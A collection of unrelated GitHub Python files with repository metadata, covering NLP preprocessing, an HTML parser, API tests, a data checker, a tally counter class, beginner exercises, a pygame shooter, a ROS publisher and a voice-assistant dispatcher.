file.write(encoded_dataset)\n logger.success('Saved dataset')\n\n\ndef process_dataset(\n at_path: str,\n tagging_format: str\n) -> str:\n \"\"\"\n Process dataset by encoding tokens with SentencePieceProcessor\n and respectively by adding new tags\n\n Parameters\n ----------\n at_path : `str`, required\n Path to the dataset in CoNLL-2003 format\n tagging_format : `str`, required\n Type of tagging in dataset.\n\n Returns\n -------\n `str`\n Encoded dataset as a string in CoNLL-2003 format\n \"\"\"\n processed_dataset = []\n with open(at_path, \"r\") as data_file:\n # Group into alternative divider / sentence chunks.\n for is_divider, lines in tqdm(itertools.groupby(data_file, is_divider_line),\n desc='Processing lines'):\n # Ignore the divider chunks, so that `lines` corresponds to the words\n # of a single sentence.\n if not is_divider:\n fields = [line.strip().split() for line in lines]\n # unzipping trick returns tuples, but our Fields need lists\n fields = [list(field) for field in zip(*fields)]\n tokens, ner_tags = fields\n # Build new sample after encoding\n sample = build_sentence_piece_tokens_and_tags(\n tokens=tokens,\n tags=ner_tags,\n tagging_format=tagging_format\n )\n processed_dataset.append('\\n'.join(sample))\n return '\\n\\n'.join(processed_dataset)\n\n\ndef is_divider_line(line: str) -> bool:\n \"\"\"\n Check whether the line is the divider\n \"\"\"\n empty_line = line.strip() == ''\n if empty_line:\n return True\n else:\n first_token = line.split()[0]\n if first_token == \"-DOCSTART-\":\n return True\n else:\n return False\n\n\ndef build_sentence_piece_tokens_and_tags(\n tokens: List[str],\n tags: List[str],\n tagging_format: str\n) -> List[str]:\n \"\"\"\n Encode tokens with SentencePiece and also expand tags for NER based on encoding\n\n Parameters\n ----------\n tokens : `List[str]`, required\n Tokens from sentence\n tags : `List[str]`, required\n List of tags for each token in sentence\n tagging_format : `str`, required\n Type of tagging in dataset.\n\n Returns\n -------\n `List[str]`\n List of tokens with its corresponding tags separated by space\n \"\"\"\n encoded_tokens = []\n tags_for_encoded_tokens = []\n for i, (token, tag) in enumerate(zip(tokens, tags)):\n encoded_token = SENTENCEPIECE_MODEL.EncodeAsPieces(str(token))\n encoded_tokens.extend([e_token for e_token in encoded_token])\n number_of_tags_to_append = len(encoded_token)\n if tagging_format == 'BIO':\n if tag.startswith('B-'):\n number_of_tags_to_append -= 1\n tags_for_encoded_tokens.append(tag)\n tags_for_encoded_tokens.extend([\n f'I-{tag[2:]}' if tag.startswith('B-') or tag.startswith('I-')\n else 'O' for _ in range(number_of_tags_to_append)\n ])\n elif tagging_format == 'IOB':\n if (\n (tag.startswith('I-') and tags[i - 1][2:] != tag[2:])\n or tag.startswith('B-')\n ):\n number_of_tags_to_append -= 1\n tags_for_encoded_tokens.append(\n f'B-{tag[2:]}' if number_of_tags_to_append > 1 else f'I-{tag[2:]}'\n )\n tags_for_encoded_tokens.extend([\n f'I-{tag[2:]}' if tag.startswith('B-') or tag.startswith('I-')\n else 'O' for _ in range(number_of_tags_to_append)\n ])\n else:\n raise ValueError(\n 'Invalid tagging_format. '\n 'Only BIO and IOB supported.'\n )\n assert len(encoded_tokens) == len(tags_for_encoded_tokens), \\\n \"Number of tokens is not equal to number of tags\"\n return [f\"{word} {tag}\" for word, tag in zip(encoded_tokens, tags_for_encoded_tokens)]\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument('--dataset_paths', nargs=\"+\", required=True,\n help=\"Paths to dataset for encoding. Ordinary these are train, test and valid datasets\")\n parser.add_argument(\"--sentencepiece_model_path\", help=\"Path to trained SentencePiece model\",\n required=True, type=str)\n parser.add_argument(\"--tagging_format\", required=True, type=str,\n help=\"Type of tagging that is used in the dataset. Only BIO and IOB are supported\")\n main(args=parser.parse_args())\n","repo_name":"Nemexur/NER-with-LSTM-and-Transformer","sub_path":"common/apply_sentencepiece.py","file_name":"apply_sentencepiece.py","file_ext":"py","file_size_in_byte":5578,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"36472180189","text":"# -*- coding: utf-8 -*-\n\nfrom html.parser import HTMLParser\n\n\nclass News_parser(HTMLParser):\n def __init__(self):\n HTMLParser.__init__(self)\n self.title = False\n self.link = False\n self.data = []\n\n def handle_starttag(self, tag, attrs):\n attrs = dict(attrs)\n if tag == \"h2\" and \"class\" in attrs and attrs['class'] == \"esc-lead-article-title\":\n self.data.append({})\n self.title = True\n self.link = True\n\n if tag == \"a\" and self.link == True:\n self.data[-1].update({\"link\": attrs[\"href\"]})\n\n def handle_data(self, data):\n if self.title == True or self.link == True:\n self.data[-1].update({\"title\": data})\n self.title = False\n self.link = False\n","repo_name":"Taillook/PyNews","sub_path":"py_news/news.py","file_name":"news.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"35"} +{"seq_id":"6409549880","text":"\"\"\"modules\"\"\"\nimport requests\nimport allure\n\n@allure.feature('API test')\n@allure.story('Status code')\ndef test_available_access():\n \"\"\"modules\"\"\"\n response = requests.get(\"http://av.by\", timeout=10)\n assert response.status_code == 200\n\n\n@allure.feature('API test')\n@allure.story('Status code')\ndef test_not_available_access():\n \"\"\"modules\"\"\"\n response = requests.get(\"https://cars.av.by/alfa-romeo/giulietta/100889306\", timeout=10)\n assert response.status_code != 200\n\n\n@allure.feature('API test')\n@allure.story('Status code')\ndef test_not_authorize_access():\n \"\"\"modules\"\"\"\n response = requests.get(\"http://av.by/api\", timeout=10)\n text = response.json\n print(text)\n assert response.status_code == 401\n\n\n@allure.feature('API test')\n@allure.story('Headers')\ndef test_check_headers():\n \"\"\"modules\"\"\"\n response = requests.get(\"http://av.by/api\", timeout=10)\n data = response.request.headers\n print(data)\n assert response.headers[\"Connection\"] == \"keep-alive\"\n","repo_name":"AndreiQA/website_test","sub_path":"tests/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"8862883240","text":"import numpy as np\nimport glob\nimport re\nimport threading\n\nCHANNELS_TO_CHECK = 4\nclass TestdataCheckerThread (threading.Thread):\n def __init__(self, channel):\n threading.Thread.__init__(self)\n self.channel = channel\n \n def run(self):\n paths = glob.glob(f'/media/nvme-stripe/capture_{self.channel}_*.bin')\n paths.sort(key=lambda var:[int(x) if x.isdigit() else x for x in re.findall(r'[^0-9]|[0-9]+', var)])\n last_counter_of_previous_file = 0\n print(f'Checking channel {self.channel}.')\n if not paths:\n print(f'Channel {self.channel} has no data.')\n\n for file_idx, path in enumerate(paths):\n iq = np.fromfile(path, dtype=np.uint16)\n iq = np.reshape(iq, (-1, 4)).T\n print(f'Checking file {file_idx} of {len(paths)}.')\n for idx in range(4):\n assert (np.any(iq[idx] & 0xF000 == 0x1000 * (idx + 1))) # check the channel order\n counter_only = iq[idx] & ~0xF000 #read the actual counters\n diffs = np.diff(counter_only) # the data generator counts up to 2**12-1\n indexes = np.argwhere(diffs != 1) # so diffs should always be 1 or 4095\n diffout = counter_only[indexes]\n assert np.all(diffout == 4095)\n if file_idx != 0:\n if last_counter_of_previous_file == 4095:\n counter_only[0] == 0\n else:\n assert counter_only[0] == last_counter_of_previous_file + 1\n last_counter_of_previous_file = counter_only[-1]\n print(f'Channel {self.channel} is OK.')\n\nif __name__ == '__main__':\n threads = []\n for channel in range(CHANNELS_TO_CHECK):\n t = TestdataCheckerThread(channel=channel)\n t.start()\n threads.append(t)\n\n for t in threads:\n t.join()","repo_name":"Rohde-Schwarz/rs-wbiq","sub_path":"src/data_checker/data_checker.py","file_name":"data_checker.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"31625703676","text":"\"\"\"A pytest plugin for using pyfakefs as a fixture\n\nWhen pyfakefs is installed, the \"fs\" fixture becomes available.\n\n:Usage:\n\ndef my_fakefs_test(fs):\n fs.create_file('/var/data/xx1.txt')\n assert os.path.exists('/var/data/xx1.txt')\n\"\"\"\nimport py\nimport pytest\nfrom pyfakefs.fake_filesystem_unittest import Patcher\n\nPatcher.SKIPMODULES.add(py) # Ignore pytest components when faking filesystem\n\n\n@pytest.fixture\ndef fs(request):\n \"\"\" Fake filesystem. \"\"\"\n patcher = Patcher()\n patcher.setUp()\n request.addfinalizer(patcher.tearDown)\n return patcher.fs\n","repo_name":"kobayashi/s3monkey","sub_path":"s3monkey/pyfakefs/pytest_plugin.py","file_name":"pytest_plugin.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":402,"dataset":"github-code","pt":"19"} +{"seq_id":"43503255945","text":"import os\n\nprint(os.getcwd())\nos.mkdir(\"Dir_1\")\nos.chdir(\"Dir_1\")\nos.mkdir(\"Dir_2\")\nos.chdir(\"Dir_2\")\nprint(os.getcwd())\nos.chdir(\"..\")\nos.mkdir(\"Dir_3\")\nos.chdir(\"Dir_3\")\nos.mkdir(\"Dir_4\")\nos.chdir(\"Dir_4\")\nprint(os.getcwd())\n\nquestion = input(\"Do you want to delete the folders you created? Press Yes or No: \")\n\nif question == \"Yes\":\n os.chdir(\"..\")\n os.rmdir(\"Dir_4\")\n os.chdir(\"..\")\n os.rmdir(\"Dir_3\")\n os.rmdir(\"Dir_2\")\n os.chdir(\"..\")\n os.rmdir(\"Dir_1\")\n print(os.getcwd())\n","repo_name":"Anush184/Homework","sub_path":"createdir.py","file_name":"createdir.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"4448235557","text":"\"\"\"Tally Counter.\"\"\"\nfrom __future__ import annotations\n\nimport threading\n\nfrom typing import Any\n\nfrom .series import _Series\n\n\nclass Counter:\n \"\"\"A container for any number of named data series.\"\"\"\n\n def __init__(self, *args: str, **kwargs: int) -> None:\n # Thread safety lock\n self._lock = threading.RLock()\n\n ttl = self._get_int_or_none(kwargs, \"ttl\")\n maxlen = self._get_int_or_none(kwargs, \"maxlen\")\n\n init_data: dict[str, _Series] = {}\n for k in args:\n init_data[str(k)] = _Series(None, ttl=ttl, maxlen=maxlen, lock=self._lock)\n\n for k, v in kwargs.items():\n init_data[str(k)] = _Series(int(v), ttl=ttl, maxlen=maxlen, lock=self._lock)\n\n with self._lock:\n self.__data = init_data\n self.__ttl = ttl\n self.__maxlen = maxlen\n\n @property\n def data(self) -> dict[str, list[tuple[int, int]]]:\n \"\"\"Return all data for this counter.\"\"\"\n with self._lock:\n return {k: v.data for k, v in self.__data.items()}\n\n @property\n def ttl(self) -> int | None:\n \"\"\"Return thr `ttl` property.\"\"\"\n with self._lock:\n return self.__ttl\n\n def __getattr__(self, name: str) -> _Series:\n \"\"\"\n Return a data series for the given attribute name.\n\n If no data series exists for the given name, then create an empty series and\n return that.\n \"\"\"\n return self._get_or_create_series(key=name)\n\n def __getitem__(self, key: str) -> _Series:\n \"\"\"\n Return a data series for the given key value.\n\n If no data series exists for the given key, then create an empty series and\n return that.\n \"\"\"\n return self._get_or_create_series(key=key)\n\n @staticmethod\n def _get_int_or_none(container: dict[str, Any], key: str) -> int | None:\n try:\n return int(container.pop(key))\n except KeyError:\n return None\n except ValueError as e:\n raise TypeError(f\"'int' expected for argument '{key}'\") from e\n\n def _get_or_create_series(self, key: str) -> _Series:\n with self._lock:\n if key not in self.__data:\n self.__data[key] = _Series(\n None, ttl=self.__ttl, maxlen=self.__maxlen, lock=self._lock\n )\n\n return self.__data[key]\n","repo_name":"houseman/tally-counter","sub_path":"src/tally_counter/counter.py","file_name":"counter.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"19"} +{"seq_id":"18181670098","text":"#RANDOM DSA IN PYTHON\n\ntel = {'jack': 1234, 'ben': 4567, 'ris': 8904}\n#print(tel['ris'])\n\ntel['ze'] = 13425664\nsorted(tel)\n\n#print(tel['ze'])\n\n#print(list(tel))\n\n#for k in tel.items():\n #print(k)\n\nmyList = ['tic', 'tac', 'toe']\nprint(len(myList))\n\n#for n in myList:\n # print (n)\n # print('.......................')\n \n#for i in range (len (myList)):\n # print(myList[i])\n # print('........................')\n\n#presidents = ['kibaki', 'uhuru', 'mwai', 'daniel', 'mzee']\n#for num, name in enumerate(presidents):\n # print(num, name)\n\nquestion = ['name', 'food', 'career']\nanswer = ['Harry', 'pork', 'elite software dev']\n\nfor q, a in zip(question, answer):\n print (\"What is your {0}? It is {1}.\".format(q, a))\n\nr = [1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 10]\nfor i in r:\n print(i)","repo_name":"GitauHarrison/automate-the-boring-stuff","sub_path":"dsa.py","file_name":"dsa.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20275216311","text":"import pygame\nfrom pygame.sprite import Sprite\n\nclass Platform(Sprite):\n def __init__(self, JA):\n super().__init__()\n self.settings = JA.settings\n self.screen = JA.screen\n self.player = JA.player\n\n #platform\n self.image = pygame.Surface((self.settings.platform_width,self.settings.platform_height))\n self.rect = self.image.get_rect()\n self.rect.center = (150,self.settings.screen_height - 60)\n\n","repo_name":"abhijit360/Jump_game","sub_path":"platform.py","file_name":"platform.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"39839828502","text":"# 풀이 1: 딕셔너리 활용\n\nword = input()\ndic = {}\nmost_frequently = -1\nans = []\n\nfor i in word:\n i = i.lower()\n if i.lower() not in dic:\n dic[i] = 1\n else:\n dic[i] += 1\n\nfor i in dic:\n if dic[i] > most_frequently:\n most_frequently = dic[i]\n\nfor i in dic:\n if dic[i] == most_frequently:\n ans.append(i)\n\nif len(ans) > 1:\n print(\"?\")\nelse:\n print(ans[0].upper())\n\n","repo_name":"vanellotree/daily-algorithm","sub_path":"BOJ/string/01157-단어 공부.py","file_name":"01157-단어 공부.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"42324594780","text":"#!/usr/bin/env python\n\nimport rospy\n\nfrom xenobot.msg import segment\nfrom xenobot.msg import segmentArray\nfrom numpy import random\nimport math\n\nsegment_data_array = None\ndata_size = 50\nhz = 5\n\ndef data_gen():\n\tglobal segment_data_array\n\tsegment_data_array = segmentArray()\n\tfor i in range(0, data_size, 1):\n\t\tsegment_data = segment(d=-25 + 50*random.rand(),phi=180*random.rand(),color=math.floor(random.rand()*2))\n\t\t#segment_data.data = (d=2.0,phi=1.0,color=0)\n\t\tsegment_data_array.segments.append(segment_data)\n\ndef main():\n\trospy.init_node('publish_test',anonymous=True)\n\n\ttopic_name = \"/xenobot/segment_data\"\n\n\tpub = rospy.Publisher(topic_name,segmentArray,queue_size=5)\n\trate = rospy.Rate(hz)\n\twhile not rospy.is_shutdown():\n\t\tdata_gen()\n\t\tpub.publish(segment_data_array)\n\t\trate.sleep()\n\nif __name__ == '__main__':\n\ttry:\n\t\tmain()\n\texcept rospy.ROSInterruptException:\n\t\tpass\n","repo_name":"Puyuma/puyuma-core","sub_path":"tools/publish_test.py","file_name":"publish_test.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"19"} +{"seq_id":"21071727925","text":"from random import randint\nbalance = 200\nprint(balance)\nname = input(\"как тебя зовут? \")\nprint(\"привет \" + name)\nadd = int(input(\"сколько ты вложишь на свой счет: \"))\nbalance = balance + add\nprint(\"сумма вашего бюджета равна: \" + str (balance))\nproducts = ['пс 4', 'Нинтендо', 'Пк', 'Айфон', 'Пс 5']\ntovar = input('Наличие какого товара вы хотите узнать: ')\nif tovar in products:\n print('У нас есть- ', tovar)\nif tovar == 'Айфон':\n balance = balance + 1000\nelif tovar == 'Нинтендо':\n balance = balance + 500\nelif tovar == \"Пк\":\n balance = balance + 500\nelif tovar == 'Пс 5':\n balance = balance + 500\nelif tovar == 'пс 4':\n balance = balance + 500\n\nprint('Будете брать?- ', tovar)\nadd = int(input(\"сколько ты выведешь из своего счета: \"))\nbalance = balance - add\nprint(\"сумма вашего бюджета равна: \" + str (balance))\nanswer = input (\"Хочешь поддержать автора \")\nif answer.upper() == 'ДА':\n print(\"спасибо- кидать сюда 4276 1000 2549 0365\")\nif answer.upper() == 'НЕТ':\n print(\"Ну и не надо\")\nprint(\"Вот все наши продукты: айфон-1000$\",\"Пк-500$\",\"Нинтендо-200$\",\"пс4-300$\",\"пс5-800$\")\n","repo_name":"nibezo/B4111-python","sub_path":"final/arseniy.py","file_name":"arseniy.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"25767698752","text":"import pygame # pygame 라이브러리\r\nimport sys #\r\nfrom time import sleep\r\nimport random\r\n\r\nBLACK = (0, 0, 0) # RGB 0 0 0\r\npadWidth = 480 # 게임화면의 가로크기\r\npadHeight = 620 # 게임화면의 세로크기\r\nfalling_object = ['','','','','','','','','',''] # 떨어지는 물체 이미지들\r\npower = ['','','','','','','','','',''] # 전기 이미지\r\n\r\ndef drawObject(obj, x ,y): # 게임에 등장하는 객체를 드로잉\r\n global gamePad\r\n gamePad.blit(obj,(x,y))\r\n\r\ndef initGame(): # 게임초기화\r\n global gamePad, clock ,background, earth, tear, explosion # 글로벌 변수\r\n pygame.init() # 파이게임 초기화\r\n gamePad = pygame.display.set_mode((padWidth, padHeight)) # 게임크기 정의\r\n pygame.display.set_caption(\"지구를 지켜라\") # 게임 이름 창의 제목으로 띄워주는 부분\r\n background = pygame.image.load(\"e:\\\\stgame\\녹는빙하3.png\")\r\n # 배경그림 위에 게임화면 설정과 픽셀이 같아야 올바른 이미지 출력\r\n earth = pygame.image.load(\"e:\\\\stgame\\아픈지구700.png\")\r\n tear = pygame.image.load((\"e:\\\\stgame\\눈물1.png\"))\r\n explosion = pygame.image.load((\"e:\\\\stgame\\눈물1.png\")) # 폭발 그림 그리고 밑에 반짝 그림\r\n clock = pygame.time.Clock()\r\n\r\ndef runGame():\r\n global gamepad, clock, background, earth, tear, explosion # 지구\r\n\r\n #전투기 크기 현제 픽셀은 50*50 픽셀과 관련되있나 확인\r\n earthSize = earth.get_rect().size # get_rect() 함수 게임 객체 크기정보 + 좌표정보\r\n earthWidth = earthSize[0]\r\n earthHeight = earthSize[1]\r\n\r\n # 전투기 초기 위치(x,y)\r\n x = padWidth * 0.45\r\n y = padHeight * 0.9\r\n earthX = 0\r\n\r\n tearXY=[] # 무기 좌표 리스트\r\n\r\n #떨어지는 물체 와 전력 랝덤 생성\r\n obj = pygame.image.load(random.choice(falling_object))\r\n objSize = obj.get_rect().size # 물체 크기\r\n objWidth = objSize[0]\r\n objHeight = objSize[1]\r\n\r\n # 물체 및 파워 초기 위치 설정\r\n objX = random.randrange(0, padWidth - objWidth)\r\n objY = 0\r\n objSpeed = 2 #속도를 의미 하는 듯? 이것도 랜덤 가능한지 확인\r\n\r\n # 전투기 미사일에 운석이 맞았을 경우 True\r\n isShot = False\r\n shotCount = 0\r\n objPassed = 0\r\n\r\n onGame = False\r\n while not onGame:\r\n for event in pygame.event.get():\r\n if event.type in [pygame.QUIT]: # 게임종료하는 함수\r\n pygame.quit() # 창을 닫거나 하면 파이게임을 종료 or 시스템 종료시키는 이벤트 처리\r\n sys.exit()\r\n # 이후 상하좌우로 바꿔야지~\r\n if event.type in [pygame.KEYDOWN]: # 키보드를 누른 후 뗼떄 발생함.\r\n if event.key == pygame.K_LEFT: # 지구 왼쪽으로 이동\r\n earthX -= 5 # 속도\r\n elif event.key == pygame.K_RIGHT:# 지구 오른쪽으로 이동\r\n earthX += 5\r\n elif event.key == pygame.K_SPACE: # 미사일 발사~~\r\n tearX = x + earthWidth/2\r\n tearY = y - earthHeight\r\n tearXY.append([tearX, tearY])\r\n\r\n if event.type in [pygame.KEYUP]: #방향키를 뗴면 전투기 멈춤 (KEYUP은 키보드 누를 떄 발생함.)\r\n if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\r\n earthX = 0\r\n\r\n # 전투기 위치 재조정\r\n x += earthX\r\n if x < 0:\r\n x = 0\r\n elif x > padWidth - earthWidth:\r\n x = padWidth - earthWidth\r\n\r\n drawObject(background, 0, 0) #녹는 빙하 배경화면 그리기\r\n drawObject(earth, x, y)\r\n\r\n # 미사일 발사 화면에 그리기 drawObject(earth, x, y) 밑에 !\r\n if len(tearXY) != 0:\r\n for i, bxy in enumerate(tearXY): # 미사일 요소에 대해 반복함 enumerate() 확인 할 것\r\n bxy[1] -= 10 # 총알의 y 좌표 - 10 (위로 이동?)\r\n tearXY[i][1] = bxy[1]\r\n\r\n # 미사일이 운석을 맞추었을 경우\r\n if bxy[1] < objY:\r\n if bxy[0] > objX and bxy[0] < objX + objWidth: tearXY.remove(bxy)\r\n isShot = True\r\n shotCount += 1 #\r\n\r\n if bxy[1] <= 0: # 미사일이 화면 밖으로 벗어나면\r\n try:\r\n tearXY.remove(bxy) #미사일 제거\r\n except:\r\n pass\r\n # 물체 맞췄을 떄\r\n if isShot: # 운석 폭발\r\n drawObject(explosion,objX,objY) # 물체 폭발 이미지\r\n\r\n #새로운 물체 랜덤\r\n obj = pygame.image.load(random.choice(falling_object))\r\n objSize = obj.get_rect().size # 물체 크기\r\n objWidth = objSize[0]\r\n objHeight = objSize[1]\r\n objX = random.randrange(0, padWidth - objWidth)\r\n objY = 0\r\n isShot = False\r\n\r\n # 운석 맞추면 속도 증가?\r\n objSpeed += 0.02\r\n if objSpeed >= 10:\r\n objSpeed = 10\r\n drawObject(falling_object, objX, objY) #물체 그리기 아래 물체그리기랑 중복 확인\r\n\r\n\r\n if len(tearXY) != 0: # 미사일 발사 관련\r\n for bx, by in tearXY:\r\n drawObject(tear, bx, by)\r\n writeScore(shotCount) # 뮬체 맞춘 점수 표시\r\n objY =+ objSpeed # 물체 알래로 움직임\r\n\r\n #물체가 바닥으로 떨어진 경우?\r\n if objY > padHeight:\r\n # 새로운 물체 (랜덤)\r\n obj = pygame.image.load(random.choice(falling_object))\r\n objSize = obj.get_rect().size # 물체 크기\r\n objWidth = objSize[0]\r\n objHeight = objSize[1]\r\n objX = random.randrange(0,padWidth-objWidth)\r\n objY = 0\r\n objSpeed += 1 # 이거 왜 했는지?\r\n # drawObject(falling_object, objX, objY) # 물체 그리기 얘 왜 갑자기 코딩이 없어지지?\r\n if objPassed == 3: # 운석 3개 놓치면 게임 오버\r\n gameOver()\r\n\r\n writePassed(objPassed)\r\n\r\n\r\n\r\n # gamePad.fill(BLACK) # 게임 화면 (검정색색\r\n pygame.display.update() # 게임화면을 다시그림\r\n clock.tick(60) # 게임화면의 초당 프레임수를 50으로 설정\r\n pygame.quit() # pygame 종료\r\n\r\n#게임 메시지 출력\r\ndef writeMessage(text):\r\n global gamePad\r\n textfont = pygame.font.Font('NanumGothic.ttf',80)\r\n text = textfont.render(text,True, (255,0, 0))\r\n textpos = text.get_rect()\r\n textpos.center = (padWidth / 2, padHeight / 2)\r\n gamePad.blit(text,textpos)\r\n pygame.display.update()\r\n sleep(2)\r\n runGame()\r\n\r\n# 지구가 물체과 충돌했을 때 메시지 출력\r\ndef crash():\r\n global gamePad\r\n writeMessage('전투기 파괴 ')\r\n\r\n# 게임오버 메시지 보이기\r\ndef gameOver():\r\n global gamePad\r\n writeMessage('게임오버 ')\r\n\r\n# 물체를 맞춘 개수 계산\r\ndef writeScore(count):\r\n global gamePad\r\n font = pygame.font.Font('NanumGothic.ttf',20) # 글자 사이즈\r\n text = font.render('파괴한 운석 수 :' +str(count),True,(255,255,255)) # 색 True? 이거 확인 할 것\r\n gamePad.blit(text,(10,0)) # 위치조정\r\n# 물체가 화면 아래로 통과한 개수\r\ndef writePassed(count): # 이건 값을 -해주자\r\n global gamePad\r\n font = pygame.font.Font('NanumGothic.ttf', 20) # 글자 사이즈\r\n text = font.render('놓친 운석 :' + str(count), True, (255, 255, 255))\r\n gamePad.blit(text, (360, 0))\r\n\r\ninitGame()\r\nrunGame()\r\n\r\n# import os\r\n# import sys\r\n# import math\r\n# import pygame\r\n# import pygame.mixer\r\n# from pygame.locals import *\r\n#\r\n# black = 0,0,0\r\n# white = 255,255,255\r\n# red = 255,0,0\r\n# green = 0,255,0\r\n# blue = 0,0,255\r\n#\r\n# screen = screen_width, screen_height = 600, 400\r\n#\r\n# clock = pygame.time.Clock()\r\n#\r\n# pygame.display.set_caption(\"Physics\")\r\n#\r\n# fps_cap = 120\r\n# running = True\r\n# while running:\r\n# clock.tick(fps_cap)\r\n#\r\n# for event in pygame.event.get(): #error is here\r\n# if event.type == pygame.QUIT:\r\n# running = False\r\n#\r\n# screen.fill(white)\r\n#\r\n# pygame.display.flip()\r\n#\r\n# pygame.quit()\r\n# sys.exit\r\n# #!/usr/bin/env python","repo_name":"khfbvxz/bitpy","sub_path":"stgame.py","file_name":"stgame.py","file_ext":"py","file_size_in_byte":8420,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"1267549876","text":"import logging\nimport coloredlogs\nimport sys\nfrom _command_mapping import COMMAND_MAPPINGS, COMMAND_DETAILS, MSFT_ACCOUNT_NAME_LIST\nfrom _helper import *\nfrom azure import *\nimport pyttsx3\nfrom typing import Callable\n\n# setup the text to speech engine\nengine: pyttsx3.Engine = pyttsx3.init()\n# rate at which you want the bot to talk\nengine.setProperty(\"rate\", 125)\nvoices = engine.getProperty(\"voices\")\nengine.setProperty(\"voice\", voices[1].id)\n\n\ndef speak_out(text: str):\n \"\"\"Speak out things from the text\n\n Args:\n text (str): text to be spoken\n \"\"\"\n\n engine.say(text)\n engine.runAndWait()\n\n\ndef show_help(mode):\n \"\"\"Speak out the commands that the users can perform\n\n Args:\n mode (str): how many to show\n\n Returns:\n bool, str: method status, aggregated text from command description\n \"\"\"\n\n command_success = True\n try:\n total_commands_counter = len(list(COMMAND_DETAILS.items()))\n commands_text = \"Here are some commands that you can use, \"\n # get all the commands from the list\n if mode == \"all\":\n for id, (_, command_info) in enumerate(COMMAND_DETAILS.items()):\n if command_info.get(\"method_name\").find(\"help\") == -1:\n commands_text += f\". {command_info.get('description')}.\"\n else:\n # get only the top 6 commands from the list\n for id, (_, command_info) in enumerate(COMMAND_DETAILS.items()):\n if command_info.get(\"method_name\").find(\"help\") == -1:\n commands_text += f\"{command_info.get('description')}, \"\n if id == 5:\n break\n\n text = f\"There are a total of {total_commands_counter} commands. \"\n\n complete_sentense = text + commands_text\n logging.info(f\"This is help - {complete_sentense}\")\n speak_out(complete_sentense)\n\n except Exception:\n logging.exception(\"func | show_help | See the below error \")\n command_success = False\n\n return command_success, \"\"\n\n\ndef setup_logging():\n \"\"\"setting up logging configuration\"\"\"\n\n coloredlogs.install(milliseconds=True)\n coloredlogs.install(\n fmt=\"%(asctime)s,%(msecs)03d %(hostname)s %(name)s[%(process)d] | %(levelname)s | %(message)s\"\n )\n\n loghandler = logging.StreamHandler(sys.stdout)\n formatter = logging.Formatter(\"%(asctime)s | %(levelname)s | %(message)s\")\n loghandler.setFormatter(formatter)\n logging.basicConfig(level=logging.INFO, handlers=[loghandler])\n logging.info(\"Starting to log things..\")\n\n\n# work in progress\ndef advanced_command_matching():\n \"\"\"User some sort of algo/flow to match the recognized text with the commands we already have\"\"\"\n pass\n\n\ndef get_persons_email(recognized_text: str):\n \"\"\"Return the persons email address from the recognized text\n\n Args:\n recognized_tex (str): recognized text\n\n Returns:\n str: email address of the person\n \"\"\"\n\n for account in MSFT_ACCOUNT_NAME_LIST:\n if recognized_text.find(account.get(\"name\").lower()) != -1:\n return account.get(\"email\")\n\n\ndef check_chatbot_command(recognized_text: str):\n \"\"\"Check if the command is for a chatbot\n\n Args:\n recognized_text (str): recognized text from the user\n\n Returns:\n bool: True if it's a command else False\n \"\"\"\n\n for command in BOT_INITIALIZE_COMMANDS:\n if recognized_text.find(command) != -1:\n return True\n\n return False\n\n\ndef add_args_to_command_info(recognized_text: str):\n \"\"\"Add additional args to the command method\n\n Args:\n recognized_text (str): recognized text from user\n\n Returns:\n list[str]: args to be passed to the command method\n \"\"\"\n\n result_args_list = []\n # this adds email_id to the args\n email_id = get_persons_email(recognized_text)\n if email_id:\n result_args_list.append(email_id)\n\n # this adds the recognized text to the args\n if check_chatbot_command(recognized_text):\n result_args_list.append(recognized_text)\n\n return result_args_list\n\n\ndef get_command_details(recognized_text: str):\n \"\"\"Try mapping the recognized text with one of the command in the mapping list\n\n Args:\n recognized_text (str): recognized text from user\n\n Returns:\n dict: information about the command matched or None if nothing is matched\n \"\"\"\n\n for command_id, search_string_list in COMMAND_MAPPINGS.items():\n for search_string in search_string_list:\n\n # check if the text has an commands in it\n if recognized_text.find(search_string.lower()) != -1:\n command_info = COMMAND_DETAILS.get(command_id)\n\n # check if we need to add args to the command method\n if command_info.get(\"add_args\") and len(command_info.get(\"args\")) == 0:\n command_info[\"args\"] = add_args_to_command_info(recognized_text)\n\n return command_info\n\n\ndef execute_command(recognized_text: str):\n \"\"\"Get the recognized text and execute the corresponding command\n\n Args:\n text (str): recognized text from user\n \"\"\"\n\n try:\n command_info: dict = get_command_details(recognized_text)\n\n # return if nothing matches the commands we have\n if not command_info:\n logging.info(\"No matching command found!\")\n return\n\n method_name_str = command_info.get(\"method_name\")\n\n logging.info(f\"Command match found - {method_name_str}\")\n\n method_name: Callable = globals()[method_name_str]\n\n command_success, speak_args = method_name(\n *command_info.get(\"args\"), **command_info.get(\"kargs\")\n )\n\n text_to_speak = (\n command_info.get(\"success_message\")\n if command_success\n else 